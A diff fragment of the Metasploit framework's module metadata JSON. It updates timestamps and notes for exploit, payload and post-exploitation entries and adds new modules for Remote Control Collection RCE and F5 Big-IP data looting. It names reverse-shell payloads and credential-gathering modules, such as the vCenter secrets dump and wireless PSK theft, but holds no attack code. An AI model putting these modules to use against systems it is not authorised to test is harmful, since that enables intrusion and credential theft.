    "is_install_path": true,
    "ref_name": "windows/local/cve_2019_1458_wizardopium",
@@ -153139,7 +153932,7 @@
    "targets": [
      "Windows x64"
    ],
-    "mod_time": "2021-09-08 21:56:02 +0000",
+    "mod_time": "2022-12-05 10:30:53 +0000",
    "path": "/modules/exploits/windows/local/cve_2020_1313_system_orchestrator.rb",
    "is_install_path": true,
    "ref_name": "windows/local/cve_2020_1313_system_orchestrator",
@@ -153147,6 +153940,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -153188,7 +153991,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2021-09-08 21:56:02 +0000",
+    "mod_time": "2022-12-05 10:30:53 +0000",
    "path": "/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb",
    "is_install_path": true,
    "ref_name": "windows/local/cve_2020_1337_printerdemon",
@@ -153196,6 +153999,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -154248,7 +155061,7 @@
      "Windows XP SP2 / SP3",
      "Windows Server 2003 SP2"
    ],
-    "mod_time": "2021-09-08 21:56:02 +0000",
+    "mod_time": "2022-12-05 10:30:53 +0000",
    "path": "/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb",
    "is_install_path": true,
    "ref_name": "windows/local/ms11_080_afdjoinleaf",
@@ -154258,6 +155071,13 @@
    "notes": {
      "Stability": [
        "crash-os-restarts"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
      ]
    },
    "session_types": [
@@ -156166,7 +156986,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2022-04-21 15:33:42 +0000",
+    "mod_time": "2022-12-09 11:24:16 +0000",
    "path": "/modules/exploits/windows/local/s4u_persistence.rb",
    "is_install_path": true,
    "ref_name": "windows/local/s4u_persistence",
@@ -161264,6 +162084,58 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/misc/remote_control_collection_rce": {
+    "name": "Remote Control Collection RCE",
+    "fullname": "exploit/windows/misc/remote_control_collection_rce",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-09-20",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "H4rk3nz0"
+    ],
+    "description": "This module utilizes the Remote Control Server's, part\n          of the Remote Control Collection by Steppschuh, protocol\n          to deploy a payload and run it from the server.  This module will only deploy\n          a payload if the server is set without a password (default).\n          Tested against 3.1.1.12, current at the time of module writing",
+    "references": [
+      "URL-http://remote-control-collection.com",
+      "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20control%20collection/remote-control-collection-rce.py"
+    ],
+    "platform": "Windows",
+    "arch": "x64, x86",
+    "rport": 1926,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "default"
+    ],
+    "mod_time": "2022-10-28 15:03:39 +0000",
+    "path": "/modules/exploits/windows/misc/remote_control_collection_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/misc/remote_control_collection_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "screen-effects"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_windows/misc/remote_mouse_rce": {
    "name": "Remote Mouse RCE",
    "fullname": "exploit/windows/misc/remote_mouse_rce",
@@ -171594,7 +172466,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_busybox_telnetd.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_busybox_telnetd",
@@ -171628,7 +172500,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_inetd.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_inetd",
@@ -171665,7 +172537,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_jjs.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_jjs",
@@ -171699,7 +172571,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_lua",
@@ -171735,7 +172607,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_netcat.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_netcat",
@@ -171769,7 +172641,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_netcat_gaping",
@@ -171803,7 +172675,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_netcat_gaping_ipv6",
@@ -171872,7 +172744,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_perl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_perl",
@@ -171907,7 +172779,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_perl_ipv6",
@@ -171941,7 +172813,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_r.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_r",
@@ -171975,7 +172847,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_ruby.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_ruby",
@@ -172009,7 +172881,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_ruby_ipv6",
@@ -172043,7 +172915,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_socat_udp.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_socat_udp",
@@ -172112,7 +172984,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_zsh.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_zsh",
@@ -172214,7 +173086,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/pingback_bind.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/pingback_bind",
@@ -172248,7 +173120,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/pingback_reverse.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/pingback_reverse",
@@ -172870,7 +173742,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse",
@@ -172940,7 +173812,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_bash.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_bash",
@@ -172974,7 +173846,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_bash_telnet_ssl",
@@ -172999,7 +173871,7 @@
      "hdm <x@hdm.io>",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "Creates an interactive shell via bash's builtin /dev/udp.\n\n        This will not work on circa 2009 and older Debian-based Linux\n        distributions (including Ubuntu) because they compile bash\n        without the /dev/udp feature.",
+    "description": "Creates an interactive shell via bash's builtin /dev/udp.\n\n          This will not work on circa 2009 and older Debian-based Linux\n          distributions (including Ubuntu) because they compile bash\n          without the /dev/udp feature.",
    "references": [

    ],
@@ -173009,7 +173881,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_bash_udp",
@@ -173046,7 +173918,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_jjs.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_jjs",
@@ -173080,7 +173952,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ksh.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ksh",
@@ -173114,7 +173986,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_lua",
@@ -173148,7 +174020,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ncat_ssl",
@@ -173184,7 +174056,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_netcat.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_netcat",
@@ -173218,7 +174090,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_netcat_gaping",
@@ -173286,7 +174158,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_openssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_openssl",
@@ -173320,7 +174192,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_perl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_perl",
@@ -173354,7 +174226,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_perl_ssl",
@@ -173388,7 +174260,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_php_ssl",
@@ -173422,7 +174294,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_python",
@@ -173456,7 +174328,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-08 10:26:27 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_python_ssl",
@@ -173490,7 +174362,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_r.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_r",
@@ -173524,7 +174396,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ruby.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ruby",
@@ -173558,7 +174430,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ruby_ssl",
@@ -173592,7 +174464,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_socat_udp.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_socat_udp",
@@ -173627,7 +174499,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ssh.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ssh",
@@ -173662,7 +174534,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ssl_double_telnet",
@@ -173730,7 +174602,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_tclsh.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_tclsh",
@@ -173765,7 +174637,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_zsh.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_zsh",
@@ -173835,7 +174707,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/bind_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/bind_lua",
@@ -173871,7 +174743,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/bind_perl.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/bind_perl",
@@ -173907,7 +174779,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/bind_perl_ipv6",
@@ -173941,7 +174813,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/bind_ruby.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/bind_ruby",
@@ -174080,7 +174952,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/jjs_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/jjs_reverse_tcp",
@@ -185194,7 +186066,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/reverse_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/reverse_lua",
@@ -185229,7 +186101,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/reverse_perl.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/reverse_perl",
@@ -185264,7 +186136,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/reverse_powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/reverse_powershell",
@@ -185298,7 +186170,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/reverse_ruby.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/reverse_ruby",
@@ -205650,7 +206522,7 @@
    "needs_cleanup": null
  },
  "post_linux/gather/enum_commands": {
-    "name": "Testing commands needed in a function",
+    "name": "Gather Available Shell Commands",
    "fullname": "post/linux/gather/enum_commands",
    "aliases": [

@@ -205661,17 +206533,17 @@
    "author": [
      "Alberto Rafael Rodriguez Iglesias <albertocysec@gmail.com>"
    ],
-    "description": "This module will be applied on a session connected to a shell. It will check which commands are available in the system.",
+    "description": "This module will check which shell commands are available on a system.\"",
    "references": [

    ],
-    "platform": "Linux",
+    "platform": "Linux,Unix",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-24 11:22:19 +0000",
+    "mod_time": "2022-12-20 23:42:51 +0000",
    "path": "/modules/post/linux/gather/enum_commands.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/enum_commands",
@@ -205679,6 +206551,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
      "shell",
@@ -205820,7 +206701,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-08-09 15:53:58 +0000",
+    "mod_time": "2022-11-21 00:46:44 +0000",
    "path": "/modules/post/linux/gather/enum_network.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/enum_network",
@@ -205873,7 +206754,7 @@
    "needs_cleanup": null
  },
  "post_linux/gather/enum_psk": {
-    "name": "Linux Gather 802-11-Wireless-Security Credentials",
+    "name": "Linux Gather NetworkManager 802-11-Wireless-Security Credentials",
    "fullname": "post/linux/gather/enum_psk",
    "aliases": [

@@ -205884,7 +206765,7 @@
    "author": [
      "Cenk Kalpakoglu"
    ],
-    "description": "This module collects 802-11-Wireless-Security credentials such as\n          Access-Point name and Pre-Shared-Key from your target CLIENT Linux\n          machine using /etc/NetworkManager/system-connections/ files.\n          The module gathers NetworkManager's plaintext \"psk\" information.",
+    "description": "This module collects 802-11-Wireless-Security credentials such as\n          Access-Point name and Pre-Shared-Key from Linux NetworkManager\n          connection configuration files.",
    "references": [

    ],
@@ -205894,7 +206775,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-11-21 00:28:34 +0000",
    "path": "/modules/post/linux/gather/enum_psk.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/enum_psk",
@@ -205902,6 +206783,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
      "shell",
@@ -205987,6 +206877,54 @@
    ],
    "needs_cleanup": null
  },
+  "post_linux/gather/f5_loot_mcp": {
+    "name": "F5 Big-IP Gather Information from MCP Datastore",
+    "fullname": "post/linux/gather/f5_loot_mcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-11-16",
+    "type": "post",
+    "author": [
+      "Ron Bowes"
+    ],
+    "description": "This module gathers various interesting pieces of data from F5's\n          \"mcp\" datastore, which is accessed via /var/run/mcp using a\n          proprietary protocol.\n\n          Adapted from:  https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-getloot.rb",
+    "references": [
+      "URL-https://github.com/rbowes-r7/refreshing-mcp-tool",
+      "URL-https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/",
+      "URL-https://support.f5.com/csp/article/K97843387"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-11-29 17:52:23 +0000",
+    "path": "/modules/post/linux/gather/f5_loot_mcp.rb",
+    "is_install_path": true,
+    "ref_name": "linux/gather/f5_loot_mcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": null
+  },
  "post_linux/gather/gnome_commander_creds": {
    "name": "Linux Gather Gnome-Commander Creds",
    "fullname": "post/linux/gather/gnome_commander_creds",
@@ -206408,7 +207346,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-08-15 18:10:44 +0000",
+    "mod_time": "2022-11-22 11:55:47 +0000",
    "path": "/modules/post/linux/gather/tor_hiddenservices.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/tor_hiddenservices",
@@ -206429,15 +207367,20 @@
    "aliases": [

    ],
-    "rank": 0,
+    "rank": 300,
    "disclosure_date": "2022-04-15",
    "type": "post",
    "author": [
-      "npm <npm@cesium137.io>"
+      "npm <npm@cesium137.io>",
+      "Erik Wynter",
+      "h00die"
    ],
    "description": "Grab secrets and keys from the vCenter server and add them to\n          loot. This module is tested against the vCenter appliance only;\n          it will not work on Windows vCenter instances. It is intended to\n          be run after successfully acquiring root access on a vCenter\n          appliance and is useful for penetrating further into the\n          environment following a vCenter exploit that results in a root\n          shell.\n\n          Secrets include the dcAccountDN and dcAccountPassword for\n          the vCenter machine which can be used for maniuplating the SSO\n          domain via standard LDAP interface; good for plugging into the\n          vmware_vcenter_vmdir_ldap module or for adding new SSO admin\n          users. The MACHINE_SSL, VMCA_ROOT and SSO IdP certificates with\n          associated private keys are also plundered and can be used to\n          sign forged SAML assertions for the /ui admin interface.",
    "references": [
-
+      "URL-https://github.com/shmilylty/vhost_password_decrypt",
+      "CVE-2022-22948",
+      "URL-https://pentera.io/blog/information-disclosure-in-vmware-vcenter/",
+      "URL-https://github.com/ErikWynter/metasploit-framework/blob/vcenter_gather_postgresql/modules/post/multi/gather/vmware_vcenter_gather_postgresql.rb"
    ],
    "platform": "Linux,Unix",
    "arch": "",
@@ -206445,7 +207388,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-01 17:33:14 +0000",
+    "mod_time": "2022-11-19 10:33:31 +0000",
    "path": "/modules/post/linux/gather/vcenter_secrets_dump.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/vcenter_secrets_dump",
@@ -206457,11 +207400,10 @@
        "crash-safe"
      ],
      "Reliability": [
-        "repeatable-session"
+
      ],
      "SideEffects": [
-        "ioc-in-logs",
-        "artifacts-on-disk"
+        "ioc-in-logs"
      ]
    },
    "session_types": [
@@ -207660,7 +208602,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-12-27 12:32:26 +0000",
    "path": "/modules/post/multi/gather/jenkins_gather.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/jenkins_gather",
@@ -211238,7 +212180,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2022-11-17 16:49:11 +0000",
    "path": "/modules/post/windows/gather/bloodhound.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/bloodhound",
@@ -211251,6 +212193,12 @@
      ],
      "SideEffects": [
        "artifacts-on-disk"
+      ],
+      "Stability": [
+
+      ],
+      "Reliability": [
+
      ]
    },
    "session_types": [
@@ -211318,7 +212266,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-07-20 17:21:58 +0000",
+    "mod_time": "2022-11-29 21:28:15 +0000",
    "path": "/modules/post/windows/gather/checkvm.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/checkvm",
@@ -211326,9 +212274,19 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
      "meterpreter",
+      "powershell",
      "shell"
    ],
    "needs_cleanup": null
@@ -213821,6 +214779,53 @@
    ],
    "needs_cleanup": null
